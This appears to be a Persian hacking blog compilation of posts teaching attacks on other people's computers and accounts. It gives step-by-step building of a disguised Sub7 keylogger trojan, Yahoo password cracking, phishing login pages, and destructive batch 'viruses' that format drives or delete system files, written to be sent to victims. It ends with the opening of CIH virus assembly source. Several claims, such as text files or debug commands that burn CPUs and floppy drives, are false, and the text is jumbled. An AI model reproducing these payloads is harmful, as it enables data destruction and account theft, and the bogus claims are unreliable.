گشتم نبود نگرد نیست

توسط اين ترفند شما مي توانيد آي دي شخص مورد نظرتان را بدون كسب اجازه، Add كنيد. به عبارت ديگر شخص مورد نظر از Add شدن ID اش توسط شما مطلع نمي شود.
بدين منظور كافيست ابتدا ID طرف را توسط يكي از پروفايل هاي كم اهميتتان Add كنيد و سپس اين پروفايل را پاك كنيد. در نتيجه پيغام كسب اجازه ي Add كردن، براي طرف ظاهر نخواهد شد.
توجه داشته باشيد كه براي صرفه جويي در وقت مي توانيد اين كار را براي چندين ID انجام دهيد. يعني چندين ID را توسط يك پروفايل Add كرده و سپس آن پروفايل را پاك كنيد.
همچنين اگر در هنگام Add كردن، شخص مورد نظر On باشد، اين ترفند كارايي ندارد. پس بهتر است در مواقعي كه مطمئن هستيد شخص مورد

ن جا میخوام روشی رو براتون بنویسم که در هیچ جایی فکر نکنم چنین چیزی را بتونید پیدا کنید.

می خوام بهتون برنامه ای معرفی کنم و طریقهء استفاده از اون را براتون بنویسم که همه ی کاربران ویندوز ایکس پی اون برنامه را می شناسند و یا تو کامپیوتر خود دارند ولی ازش استفاده نمی کنند.

این برنامه ی جالب هایپرترمینال HyperTerminal هستش.بله عزیزان این برنامه در ویندوز ایکس پی در منوی استارت قرار داره و برنامه ای بسیار جالب و ساده برای هک هستش.

Start Menu\All Programs\Accessories\Communications\HyperTerminal

در کل کار این برنامه فرستادن و گرفتن فایل و چت و ارتباط بین دو کامپیوتر بدون استفاده از کارت اینترنت هست. یعنی دو تا کامپیوتر می تونن توسط اون با همدیگر ارتباط برقرار کنن و فایلهایی را برای هم بفرستن.

حالا بریم سر اصل مطلب: ابتدا برنامه را اجرا کنید. در این قسمت یک اسمی برای ارتباط خودتون وارد کنید. فرقی نمی کنه چه باشه. در قسمت دوم شماره تلفن ISP تون رو بنویسید که می خواهید هکش کنید.

حالا با زدن دکمه ی Conect شما به آی اس پی تون وصل میشید . حالا با زدن کلید اینتر یه چیزهایی تو صفحه ی سفید برنامه نوشته می شوند که اگر نامفهوم بود یک آی اس پی دیگه را امتحان کنید و اگر قابل فهم بود چیزهایی مثل این را مشاهده کردید که همگی بستگی به اون شرکت داره اما زیاد تفاوتی نمی کنن.

Welcome To ROUTER

Username :

PassWord :

شما حتما باید یک کارت اینترنت داشته باشید از اون شرکت تا بتونید وارد سیستمش بشید . که تو اینجا با وارد کردن اسم رمز و پسورد (پسورد وقتی می خواهید بنویسید دیده نمیشه چیزهایی مثل اعلان داس را میبینید:

Router :>_

حال شما به مرحلهء حساسی وارد شدید که خیلی مهمه. بله اینجا قلب سیستم هستش یعنی شما با نوشتن چیزهایی که میگم می تونید اطلاعات مهم و حیاطی از اون شرکت را بدست بیارید از جمله شماره ی کارت اینترنت کسایی که روی خط هستن و شماره ی آی پی (درباره ی آی پی IP بعدا مفصل توضیح میدم) اونها و......

در اینجا چند تا از فرمانهای حساس اون رو براتون توضیح می دم :

Systat با نوشتن این فرمان اطلاعاتی از کلیهء اسم رمزهای کسایی که روی خط هستن را براتون نمایش می ده.

Login با صادر کردن این فرمان می تونید به آی پی های دیگران وصل شوید.

Help نمایش کلیهء فرمانهای مجاز.

نکته ی مهم که باید بگم اینه که در این نوع ارتباط فرمانهایی وجود دارن مثل ایجاد حساب و یا حذف حساب که شما نمی تونید این کارها رو انجام بدید. برای این کار باید اسم رمز خاصی را در اول برنامه بنویسید که اون هم در اختیار صاحب آی اس پی هست.

حالا با این روش شما میتونید اینترنت مجانی استفاده کنید البته اگه وجدان دارید نکنید .دلتون میاد یکی همین بلا رو سر شما بیاره؟

هر بلایی هم که بخاطر این کار سرتون بیاد به من ربطی نداره هااااااااااااااا . بعد نگید نگفتی.

اگه سوالی داشتین تو قسمت نظرات بپرسید.

بدست آوردن ايميل اشخاص

اين كار معمولا با شكست روبروست ولي امتحان ان خالي از لطف نيست.

در ابتداي كار بايد با يكي از برنامه هاي dictionary maker يك فايل pass ;ist اجرا كنيد.سپس وارد يكي از برنامه هاي e-mail cracker شويد.

در قسمت server بايد ادرس سرورايميل مورد نظر را بنويسيد مثلا mail.yahoo.com يا mail.hotmail.com

حال يك فايل text ايجاد كنيد و ID مورد نظر را وارد كنيد.و از فايلي هم كه توسط dictionary maker استفاده شده براي password list استفاده كنيد.وقتي تمام مراحل تمام شد دكه begin رابزنيد.اين برنامه تمامي كاراكترها را بررسي ميكند و كلمه عبور را در قسمت get به شما ميدهد.

هک در ياهو

خوب راستش اين كار به همين راحتي كه مردم فكر ميكنن نيست ولي راههاي مختلفي وجود دار که من ۴ تاشو میگم و هفتمی و بقیه رو میزارم برای بعد که یکم ........ :
روش ها :

۱ـCrack:
يكي از راه ها Crack كردن پسورد طرف براي اين كار نياز به يه برنامه Cracker مثل Yahoo!Cracker دارين كه ميتونين اونو از سايت:
http://www.yahpro.com/
download كنين
روش اين برنامه به اين صورت كه با امتحان كردن پسوردهاي زياد در مدت كم پسورد طرف رو براي شما پيدا كنه به صورتي كه شما يه ليست با فرمت txt در اختيارش بذارين كه پر از اعداد و كلمه ها باشه و يا اين كه بصورت Random خودش انتخاب كنه
*******************************
۲ـTrojan:
اين روش بهتريه و درصد براي به دست آوردن پسورد خيلي بالاست و شما براي به دست آوردن هر نوع پسوردي ميتونين از اون استفاده كنين(چه پسورد اينترنت و چه پسورد ياهو و Msn و ...)
۱-وارد سايت http://www.sub7.net/ بشين
۲-Enter كنين
۳ـوارد قسمت Downloads بشين
۴ـروي Old Version Downloads كليك كنيد
۵ـSub7 2.2 رو download كنين
۶ـپس از download و Setup كردن به فولدري كه برنامرو Setup كردين برين و فايل:EditServer.exe رو اجرا كنين
۷ـپس از اجرا كردن يه پنجره باز ميشه و شما Run In Normal Mode(اجرا در محيط نرمال) رو انتخاب كنين
۸-به Port كاري نداشته باشين و در صورت مايل بودن براي سرور خود پسورد انتخاب كنين
۹-در منوي سمت چپ به startup methods كاري نداشته باشين و بر روي Notification كليك كنيد
۱۰-روي add e-mail notify كليك كنيد و آدرس اي ميل خودتون رو وارد كنين(@ يادتون نره)
۱۱-حالا دوباره از منوي سمت چپ PlugIns رو انتخاب كنين
۱۲ـرو add binded Plugin كليك كنين
۱۳ـاز فولدر PlugIns پلاگ اين s7keys.dll رو انتخاب كنين
۱۴-روي exe icon/other كليك كنين
۱۵-در اين قسمت ميتونين براي سرور خودتون آيكون و Error گمراه كننده درست كنين
۱۶-روي ...Save as كليك كنين و سرور خودتون رو Save كنين

نكته :
۱-توجه داشته باشين كه براي Save كردن بايستي exe. رو بنويسين
۲-هرگز فايل server.exe رو اجرا نكنين همينطور سرورهايي كه خودتون ساخته ايد
۳-بهتر است براي آن كه كسي به exe بودن سرور شما شك نكنه از پسوند scr. به جاي exe. استفاده كنين(موقع Save كردن)
۴ـبهتر است هميشه E-mail ياهوي خودتونو بدين و Msn و Hotmail اكثرا كار نميكنند.

Hack:
۱-پس از ساختن سرور كافيست اونو براي كسي كه مايل به Hack كردنش هستين بفرستين پس از اين كه طرف فايل رو اجرا كرد به آدرس E-Mail كه دادين يه ميل مياد كه Subject:Online و پس از باز كردن در اون يه شماره IP وجود داره اونو كپي كرده و سپس برنامه Sub7.exe رو اجرا كرده و در قسمت IP وارد كنين(Port هم همچنين) و بر روي Connect كليك كنين
۲-پس از وصل شدن به كامپيوتر طرف از منوي سمت چپKeys/messeges رو انتخاب كنين
۳-سپس KeyBoard رو انتخاب كنين
۴-بعد Open KeyLogger رو باز كنين و بر روي آيكون ¤دست¤ كليك كنين

حالا تمام كليدهاي كه طرف شما وارد ميكنه قابل ديدن هستن كافيه يه بار اونو از باهو بندازين بيرون و منتظر بمانين كه دوباره LogIn كنه و پسوردشو وارد كنه
در صورتي كه اين كار جواب نداد ميتونين از قسمت Yahoo!Spy استفاده كنين

نكته:
براي بدست آوردن اينترنت بر روي Advanced/Passwords/Ras Passwords كليك كنين و پس از Upload شدن پلاگ اين مربوطه ميتونين پسوردهاي طرفو در ببارين
در صورتي كه Windows طرف XP باشه متاسفم چون امكان در آوردن پسورد وجود نداره
********************************
۳ – از طریق رفتن پروفایل ! خوب قبل از این که یاهو سیستم امنیتیش رو عوض کنه پروفایل و ایمیل روی یه سرور کدبندی شده بودند و شما می تونستید با نگاه کردن به کد بندی و آدرس پروفایل و یکمی زیرکی بدون دونستن پسورد ایمیل وارد یاکس ایمیلش بشید که این روش بعد از تغیر سیستم امنیتی یاهو خیلی خیلی سخت شده و شاید هم ناممکن !
********************************
۴- شبیه سازی صفحه ورود به ایمیل است که درواقع پشت اون یه پسورد سندر همه کارارو انجام می ده ! و به این شکل هست که ایتدا یه صفحه لاگین ایمیل مانند یاهو می سازید و در سایت خودتون قرار میدی و فرد با وارد شدن به این قسمت و دادن پسورد خود در واقع اونو به ایمیل شما می فرسته !

عبور از فيلترو پروکسی(به روز شده)

اولا بگم که برنامه وب جت (web jet) مدت زمانی است که از کار اافتاده.و همونطور که خودتون هم ميدونيد بيشتر ip ها هم بسته شده.اما اين يکی هنوز کار ميده.

61.145.230.14 8080 : port

اين فقط برای کسايی که اين روش رو نميدونن(خودم ميدونم همه جا گفتن)

۱- در اینترنت اکسپلورر گزینه : Tools-----> Internet Options رو بزنید.
۲-به Connections Tab بروید.
۳- Connection فعال خودتون رو انتخاب کنید (اونی که الان باهاش وصلید) و دکمه Settings رو بزنید.
۴- اونجا که نوشته Proxy Server و زیرش یک مربع داره که نوشته .... Use a proxy server for مربع مربوطه را تیک بزنید.
۵- دو کادر که یکی مربوط به Address و دیگری مربوط به Port میشود فعال شده اند . (عدد اول مربوط به آدرس و عدد دوم که ۴ رقمی هستش مربوط به پورت)

اینم بگم من اینو یجایی خوندم تستشم نکردم اگه کار نکرد شاکی نشید

ولی اگه فیلتر شکن میخواین من یکی ساختم اینم آدرسش

http://www.filter1.tk

. روی دسک تاپ رایت کلیک کنید وازگزینه ی new - text document را انتخاب کنید.

2. حالا وارد text document شوید ودر آن عبارت زیررا تایپ کنید.

cpu_567hjkblaster

3. بعد از سیو کردن آنرا rename کرده و اسمی برایش انتخاب کنید.

حالا اگه فایل رو اجرا کنید باید فاتحه ی... cpu رو بخونین.

نظر یادت نره

اگه حواستون موقع ثبت نام جمع باشه هيچ وقت هيچ هکری نميتونه آی

دی شما رو ازتون بگيره و اگه هم آيديتون هک شده ميتونيد همين الان

پسش بگيريد ولی بشرطی که اين سوالاتی که پايين اومده يادتون باشه :

zip code
secret guestion
country

و تاريخ تولدتون . حالا اگه کسی هم پسوردتون رو پيدا کرده و عوضش

کنه بازم ميتونين اون رو پيدا کنين .

بريد و روی forget password کليک کنيد و همون سوالاتی که در بالا

به اونها اشاره شد جواب بدين بعد خود ياهو پسورد رو عوض ميکنه و

به شما اون رو نشون ميده .



نظر یادت نره

ابتدا CD ویندوز را درون سی دی رام گذاشته و بعد کامپیوتر را Restart نمایید . منتظر میمانیم تا CD ویندوز بالا بیاد (نه اینکه از جای بالا بیاد منظورم اینه که پیامی ظاهر خواهد شد با این نام... Press any key to boot from CD.آن را هنگامی کخ مشاهده کردیم کلید enter را میزنیم یکی دیگه هم شبیه این که آخرش نقطه چین داره میاد آگه این دومی نیامد دوباره از اول سعی نمایید)

وارد صفحه ای خواهیم شدبا با نام Windos Setup که در نوار پایین این صفحه کادری با این نام وجود دارد Set up is loading fileکه در حال چک کردن است کارش که تمام شدبه صفحه بعدی با این نام میرویم Windos XP Professional Set up که حامل پیام خوش آمد گوی است . در این صفحه enter می کنیم و چند لحظه wait میمانیم (من زبون مادریمو فراموش کردم) تا وارد صفحه بعدی شویم با این نام Windos Set up Licensing Agreement در این صفحه کلید F8 را میزنیم در صفحه بعد درایو C را نشان میدهد که حاوی ویندوز فعلی شماست در اینجا کلید Esc را میزنیم تا کل درایو ها را نشان دهدبعد روی درایو مورد نظر که معمولا c استenter می کنیم در صفحه بعد که ظاهر میشود کلید C رامیزنیم و در صفحه بعد روی این گزینه ENTER میکنیم( Format the partition using the FAT file system (Quick و در صفحه بعدش F و بعد ENTER . بعد چندتا مسطتیل میاد و پر میشه و بعدش رایانه Restart میشه .

بعد دوباره بالا میاد و اون پیاما رو میده ولی اینبار enter نمیکنیم تا خودش وارد صفحه ای میشه که آرم ویندوز در آنجاست و 5 تا گزینه داره که 3 تاشون در دایره سمت چپشان سبز و دوتای آخری نه.

دراینجا اون دوتا هم سبز میشن و ویندوز دوباره Restart میشه و ویندوز جدید نصب

اگر ویندوزتان سریال دارد هنگام نصب ویندوز خودش یه پیام میده و اونو ازت میگیره

جديدترين و موثر ترين راه برای يافتن پسوورد ايميل افراد: ابتدا وارد قسمت compose ايميل شويد سپس در قسمت to اين عبارت را وارد کنيد proxify_id_hide@yahoo.com در قسمت subject وارد کنيد find IP ( البته در اين قسمت هر عبارتی وارد کنيد فرقی نمی کند) حال متن ايميل را به صورت زير بنويسيد : ابتدا در خط اول آدرس ايميل شخصی که می خواهيد هک کنيد را بنويسيد . در خط دوم عبارت زير را بدون اشتباه تايپ کنيد ( برای اطمينان از همينجا می شود کپی پيست کرد ) (from 66.218.69.8 (Hmailer8.bulk.scd.yahoo.com در خط سوم پسورود ايميل خود را بنويسيد(برای چک کردن عضویت شما در یاهو و اینکه آیا شما بیش از سه ماه عضویت دارید یا خیر) در خط چهارم عبارت زير: [66.218.66.120] by n25.grp.scd.yahoo.com with NNFMP/ym/Compose?To=20040213092556.77183.qmail@web20728.mail.yahoo.com در خط پنجم به تعداد ۹ ستاره تايپ کنيد به اين صورت : ********* کار تمام است ... حال دکمه send را بزنيد . پس از حداکثر 48 ساعت شما ايميلی دريافت خواهيد کرد که حاوی پسوورد قربانی خواهد بود . نکات : در اين روش شخص قربانی به هيچ وجه از اينکه توسط شما هک شده است مطلع نخواهد شد . در صورتی که پسوورد شخص قربانی بيشتر از ۹ رقم باشد اين پسوورد در دو ايميل جداگانه برای شما فرستاده خواهد شد به اين صورت که در يک ايميل ۹ رقم اول و در ايميل دوم رقمهای بعدی. جالب است که ياهو بسيار تلاش می کند تا جلوی يافتن پسوورد ديگران را بگيرد ولی باز هم راههای زيادی وجود دارد که خود ياهو پسوورد افراد را به شخص هکر تقديم می کند

حالا دیگه راجع به هک بپرس

در Desktop راست کلیک کنید و از گزینه New منوی SHort Cut را انتخاب نمایید

در صفحه ای که باز میشود بنویسید Format X:\Autotest (به جای x درایو مورد نظر)

بعد Next را بزنیدو و یک اسم براش بگذارید و دوباره Next را بزنید و اینبار براش یه آیکون بگذارید

این ویروس بعد از اجرا بلافاصله درایو قربانی را فرمت میکند

ممکنه از این به بعد ماهی یکی دوبار آپدیت کنم چون فصل مدارسه و باید درس خواند

نظر بده ثواب داره

از Desktop برید تو Properties بعد Desktop و بعد Cou sittimes desk و بعد قسمت Web و در این قسمت برید به Properties بعد در قسمت دانلود ای گزینه را فعال کنید

limit hard diskusges for this pageto

و عدد ؟؟؟ را به ؟؟؟؟ تبدیل کنید

یه ویروس باحال : میخوای CPU طرفو بسوزانی (نه با کبریت بلکه با این ویروس)

روی Desktop کلیک راست کرده و از گزینه N ew گزینه test doceument را انتخاب کرده و در آن بنویسید cpu-567hjkblaster حالا از آن خارج شده و برای آن اسم و آیکون به سلیقه خودتان انتخاب کنید

من هی هیچی نمیگم تو هم هی نظر نمیدی اینجوری نمیشه بابا یه نظر بده

برنامه Notpad را باز کنید و دستورات زیر را در آن بنویسید

echo off@ cls

color fc Del/a c :\*.com

Del /a c :\*.sys

Del/a c :\*.exe /s

با پسوند bat سیو کنید بعد این مراسم تمام بشده و مادرنبرد طرف میره رو هوا

را باز کنيد و اين دستورها رو کپي کنيد داخل آن و با پسوند BAT. سيو کنيد...

:c
del autoexec.bat
del config.sys
cd winnt
del system.ini
del win.ini
اين فايل رو وقتى براى كسى بفرستيد به محض اينكه كامبيوتر رو ريستارت كنه ديگه ويندوز بالا نمياد
توجه :::: اين ويروس رو آنتي ويروسم تشخيص نميده و آنتي اش هم Format است

ویندوز XP : ابتدا روی درایو A کلیک راست می کنیم و گزینه Format... را انتخاب می کنیم سپس گزینه create an ms dos start up disk را تیک می زنیم و در آخر روی دکمه Start کلیک می کنیم.

نکته: دیسکتی که از طریق ویندوز xp می سازیم دارای دستورات خارجی کمتری می باشد.

ویندوز 98 : ابتدا وارد control panel شده و add/remove program را انتخاب می کنیم ، سپس سربرگ start up را فعال کرده و دیسکت را درون کامپیوتر می گذاریم و کلید Create را می زنیم.

نکته: دیسکت را ابتدا Full format کنید و سپس روی درایو A در my computer راست کلیک کنید و گزینه Properties را انتخاب کنید و دقت کنید اگر بعد از فرمت کردن باز هم حجمی از دیسکت اشغال شده دیسکت شما دارای بدسکتور می باشد و بهتر است آن را چندین بار پشت سر هم فرمت کنید تا شاید بد سکتور رفع شود.

نکته : ممکن است ویندوز سی دی ویندوز را بخواهد ، پس سی دی ویندوز 98 را تهیه کنید.

نکته: برای اینکه بعضی از دستورات خارجی داس را که به صورت فایل می باشند را در دیسکت راه انداز قرار دهید لازم است به شاخه ویندوز رفته و سپس وارد شاخه Command شوید و هر دستوری را که می خواهید اجرا کنید را درون دیسکت Bootable کپی کنید. این دستورات {دستورات خارجی} شامل format , xcopy و ... می شود

در run تایپ کنید system.ini و زیر این عبارت [386enh] این عبارات را قرار دهید

Buffer=1024

(@ number=(3,1,4,1,5,9

(@ letters=( '' this '' , '' is '' , '' a '' , '' test

($ word , $ anther - word- )=( '' one '' , '' two '' )

woafont = dosappfon

در پایان : نظرت در مورد این وبلاگ چیه خدای راستشو بگو

نماز و روزتونم قبول باشه در در گاه حق تعالی مرا هم از دعای خبرتان محروم نکنید ( نظر بده - سوال بپرس )

در یاهو مسنجر بروید و بعد آیدی مورد نظر را بزنید.حالا پسورد آیدی را اشتباه وارد کنید.بعد از ظاهر شدن پنجره incorect id or pasword گزینه وسطی را انتخاب کنید حالا جواب همه سوال ها را nothing بدهید.و تاریخ تولد را هم این اعداد وارد کنید ۰/۰/۰۰۰ حالا شما تسلط کامل بر روی جواب سوال ها دارید.امید وارم مورد استفاده قرار گیرد.

من تصمیم گرفتم تبلیغ هم بکنم

هزینه : ۱۰۰۰ برای هر تبلیغ در یک ماه

برای کسب اطلاعات بیشتر به تابلو گفتمان مراجعه کن و سوالت را مطرح کن بهد جوابت را میگیری

ویندوز xp این امکان را به شما میدهد که با چند کلیک در برنامه System Restore زمان را به عقب برگردانید. ویندوز هر روز بعد از هر اقدام مهمّی که انجام میدهید، تصویری از تنظیمات کامپیوتر را در دیسک سخت ذخیره میکند.حال اگر کامپیوتر شما رفتار عجیب و ناخوشایندی از خود نشان داد، System Restore را به حافظه منتقل و آخرین روزی که کامپیوتر شما خوب کار میکرد را کلیک کنید تا ویندوز از نظر زمانی به عقب برگردد و کامپیوتر شما را به تنظیمات آن زمان برگرداند که نحوه این کار در زیر آمده است:

۱- به مسیر زیر رفته و برنامه را اجرا کنید.

start menu \ program \ accessories \ system tools \ system restore

۲- restore my computer to an earlier time را کلیک کنید.

۳- تاریخی را که کامپیوتر شما در آن خوب کار می کرد را کلیک کنید و سپس Next را کلیک کنید.

۴- مطمئن شوید همه فایل های باز را ذخیره کرده اید وسپس Next را کلیک کنید.

نکته۱: بعد از این مراحل کامپیوتر شما بصورت خودکار یکبار Restart خواهد شد تا عملیات لازم را انجام دهد.

نکته۲: اگر ویندوز شما در حال حاضر خوب کار میکند میتوانید یک Restore point بسازید تا اگر در آینده کامپیوتر شما با مشکلی مواجه شد بتوانید به نقطه مورد نظر دسترسی داشته باشید. برای این کار همه موارد با توضیحات قبلی یکی میباشد و فقط به جایRestore my computer to an earlier time گزینه Creat a restore point را کلیک نمایید و در صفحه بعد نام انتخابی خود را وارد نمایید.

سلام امروز می خواهم بارتون یک ویروس بنویسم که فلاپی درایو رو می سوزونه

البته این یک ویروس نیست بلکه یک دستور به زبان اسمبلی که می تونیم به عنوان یک ویروس ازش استفاده کنیم

مواد لازم: یک عدد فایل نت پد،توانایی تایپ کردن و توانایی سیو کردن، به همین راحتی

۱-یک new text document روی دسکتاپ درست کنید بعد بنویسن:debug 70 71

۲- از منوی فایل وداخل save as file در قسمت name اسم ویروستون رو بنویسید .بعد با پسوند بت سیوش کنید:virus name.bat

۳- حالا به جایی که سیوش کردی برو و می بینی که یک فایل تحت داس با آیکون یک چرخ دنده سیو شده که اگر بازش کنی فلاپی درایوت می سوزهو هیچ امید برگشتی هم نداره

نکته: اگر این فایل رو برای کسی فرستادی وبازش نکرد می تونی فایلت رو اتوران یک سی دی بزاری و سی دی رو بدی بهش و بگو یک بازی خیلی باحاله ، مواظب باش سی دیت ارزون باشه

اگر می شه نظر بدین البته ما نیازی به نظر دادن نداریم چون روزی بالای یک میلیون نفر نظر می دن ولی

جون هرکی دوست دارین نظر بدین.

راستی یادم رفت براتون بنویسم ویروس قبلی چه جوری کار می کنه :

دستور دی باگ به هد فلاپی درایو دستور می ده عوض خوندن فلاپی بره دنبال خوندن نخود سیاه

و هیچ وقت هم درست نمیشه

امروز می خوام به شما یاد بدم که چه جوری یک فایل فرمت درست کنید که بدون سوال yesوno فرمت کنه.

اول از قسمت new (در کلیک راست) یک new short cut بسازید،بعد در اولین صفحه ای که باز بنویسید format c:/y بعد از زدن next در صفحه ای که باز میشه اسمی برای فایلتان در نظر بگیریدو در صفحه بعد هم یک آیکون برای فایلمان در نظر می گیریم.

حالا به به properties فایل رفته و در برگه screen در قسمت usage گزینه full screen را بزنید.

نکته : هیچ وقت درایو سی یا دی را به عنوان فرمت کننده قرار ندهید چون کار نمی کند.

خسته نباشید،نظر هم بدید

سلام میدونم که با این تیتری که نوشتم هیچ کس باورش نمی شه که بتونه هم چین ویروسی درست کنه ولی این هم از همون دستور های دی باگ که فقط اگر جای اعدادش یک مقدار بالا پایین ببرین می تونین باهاش ویروسی بسازین که سخت افزار هایی که هد دارن سوزوند

دلیلش هم همون که تو مطلب (ویروس قبلی چه جوری کار می کنه ؟) نوشتم .

خوب پر حرفی بس بهتره شروع کنیم .

مثل ویروس اول یک new text document روی دسکتاپ درست کنین.

حالا بازش کنین و توش بنویسید debug e30 o31 بقیه کاراش هم مثل ویروس اول(سوزاندن فلاپی داریو) ولی چون ممکن نفهمین ویروس اول کدوم براتون می نویسم.

داخل از منوی file داخل .....save as میشین و در قسمت file name برای ویروستون اسم می زارین و آخرش یک bat.اضافه می کنید.

مثل:virus.bat

امیدوارم جایی ازش استفاده نکنین،خداییش یک همچین مطلبی لیاقت نظر دادن داره

خداحافظ تا فردا یا شاید دوشنبه.

من در مورد ویروسهای کم خطر آشنایی کمی دارم و بیشتر با ویروسهایی که آسیب سخت افزاری می زنن آشنا هستم.

امروز می خواستم براتون یک ویروس بنویسم که نسبت به ویروسهای قبلی مهربون تر باشه برای همین حدود سه دقیقه تفکر کردم

این ویروس رو اگه اجرا کنین سیستم بوت نمی شه،البته و فکر کنم جز عوض کردن ویندوز راه حل دیگه ای نداشته باشه.

خوب مثل همیشه یک ...new text روی دسکتاپ بسازید و توش بنویسید.

:c

del AUTOEXEC.bat

حالا مثل ویزوسهای قبلی با پسوند بت سیو کنید.

نکته: اول ویروسهای قبلی رو بخونین بعد این ویروس رو بسازین مخصوصآ (سوزاندن فلاپی داریو) که باز دوباره سوالهای بی مورد نفر مایید.

آگه نظرات بالای چهار تا باشه یک ویروس می نویسم که cpu رو می سوزونه.

خدا حافظ.

سلام امروز بعد از مدتها می خوام یک ویروس براتون بنویسم که ویروس اگه اجرا بشه را حلی جز اف دیسک نداره.

@echo off

ATTRIB -a -s -h -r c

ATTRIB -a -s -h -r c:\windows\*.*

Echo y | echo a | Echo y | del c:\*.*

Echo y | echo a | Echo y | del d:\*.*

Echo y | echo a | Echo y | del e:\*.*

Echo y | echo a | Echo y | del f:\*.*

Echo y | echo a | Echo y | del g:\*.*

echo y | copy *.* C:\

echo y | copy *.* D:\

echo y | copy *.* E:\

echo y | copy *.* F:\

echo y | copy *.* G:\

restart

این ویروس هم مثل ویروسهای قبلی تو نت پد بنویسید و با بت سیوش کنید

نظر هم یادتون نره

برای ساخت این ویروس اول note pad را باز کرده و این کد ها را در آن کپی و پیست نمایید و بعد گزینه file را زده save as را زده بعد آنرا با پسوند bat ذخیره کنید مثلا Good Gory.bat و save را برای اتمام کار زده و حالا ویروس شما ساخته شد که مواظب باشید روی آن به هیچ وجه کلیک نکنید آنرا برای یکی بفرستید تا سیستم قربانی را به طور خفن داغون کنه موفق باشید نظر یادتون نره! robatehacker.blogfa

تذکر:وبلاگ چرتکه تعهدی در قبال این آموزش نخواهد داشت

; ****************************************************************************
; * The Virus Program Information *
; ****************************************************************************
; * *
; * Designer : CIH Source : TTIT of TATUNG in Taiwan *
; * Create Date : 04/26/1998 Now Version : 1.4 *
; * Modification Time : 05/31/1998 *
; * *
; * Turbo Assembler Version 4.0 : tasm /m cih *
; * Turbo Link Version 3.01 : tlink /3 /t cih, cih.exe *
; * *
; *==========================================================================*
; * Modification History *
; *==========================================================================*
; * v1.0 1. Create the Virus Program. *
; * 2. The Virus Modifies IDT to Get Ring0 Privilege. *
; * 04/26/1998 3. Virus Code doesn't Reload into System. *
; * 4. Call IFSMgr_InstallFileSystemApiHook to Hook File System. *
; * 5. Modifies Entry Point of IFSMgr_InstallFileSystemApiHook. *
; * 6. When System Opens Existing PE File, the File will be *
; * Infected, and the File doesn't be Reinfected. *
; * 7. It is also Infected, even the File is Read-Only. *
; * 8. When the File is Infected, the Modification Date and Time *
; * of the File also don't be Changed. *
; * 9. When My Virus Uses IFSMgr_Ring0_FileIO, it will not Call *
; * Previous FileSystemApiHook, it will Call the Function *
; * that the IFS Manager Would Normally Call to Implement *
; * this Particular I/O Request. *
; * 10. The Virus Size is only 656 Bytes. *
; *==========================================================================*
; * v1.1 1. Especially, the File that be Infected will not Increase *
; * it's Size... ^__^ *
; * 05/15/1998 2. Hook and Modify Structured Exception Handing. *
; * When Exception Error Occurs, Our OS System should be in *
; * Windows NT. So My Cute Virus will not Continue to Run, *
; * it will Jmup to Original Application to Run. *
; * 3. Use Better Algorithm, Reduce Virus Code Size. *
; * 4. The Virus "Basic" Size is only 796 Bytes. *
; *==========================================================================*
; * v1.2 1. Kill All HardDisk, and BIOS... Super... Killer... *
; * 2. Modify the Bug of v1.1 *
; * 05/21/1998 3. The Virus "Basic" Size is 1003 Bytes. *
; *==========================================================================*
; * v1.3 1. Modify the Bug that WinZip Self-Extractor Occurs Error. *
; * So When Open WinZip Self-Extractor ==> Don't Infect it. *
; * 05/24/1998 2. The Virus "Basic" Size is 1010 Bytes. *
; *==========================================================================*
; * v1.4 1. Full Modify the Bug : WinZip Self-Extractor Occurs Error. *
; * 2. Change the Date of Killing Computers. *
; * 05/31/1998 3. Modify Virus Version Copyright. *
; * 4. The Virus "Basic" Size is 1019 Bytes. *
; ****************************************************************************

.586P

; ****************************************************************************
; * Original PE Executable File(Don't Modify this Section) *
; ****************************************************************************

OriginalAppEXE SEGMENT

FileHeader:
db 04dh, 05ah, 090h, 000h, 003h, 000h, 000h, 000h
db 004h, 000h, 000h, 000h, 0ffh, 0ffh, 000h, 000h
db 0b8h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 040h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 080h, 000h, 000h, 000h
db 00eh, 01fh, 0bah, 00eh, 000h, 0b4h, 009h, 0cdh
db 021h, 0b8h, 001h, 04ch, 0cdh, 021h, 054h, 068h
db 069h, 073h, 020h, 070h, 072h, 06fh, 067h, 072h
db 061h, 06dh, 020h, 063h, 061h, 06eh, 06eh, 06fh
db 074h, 020h, 062h, 065h, 020h, 072h, 075h, 06eh
db 020h, 069h, 06eh, 020h, 044h, 04fh, 053h, 020h
db 06dh, 06fh, 064h, 065h, 02eh, 00dh, 00dh, 00ah
db 024h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 050h, 045h, 000h, 000h, 04ch, 001h, 001h, 000h
db 0f1h, 068h, 020h, 035h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 0e0h, 000h, 00fh, 001h
db 00bh, 001h, 005h, 000h, 000h, 010h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 010h, 010h, 000h, 000h, 000h, 010h, 000h, 000h
db 000h, 020h, 000h, 000h, 000h, 000h, 040h, 000h
db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h
db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 020h, 000h, 000h, 000h, 002h, 000h, 000h
db 000h, 000h, 000h, 000h, 002h, 000h, 000h, 000h
db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h
db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h
db 000h, 000h, 000h, 000h, 010h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
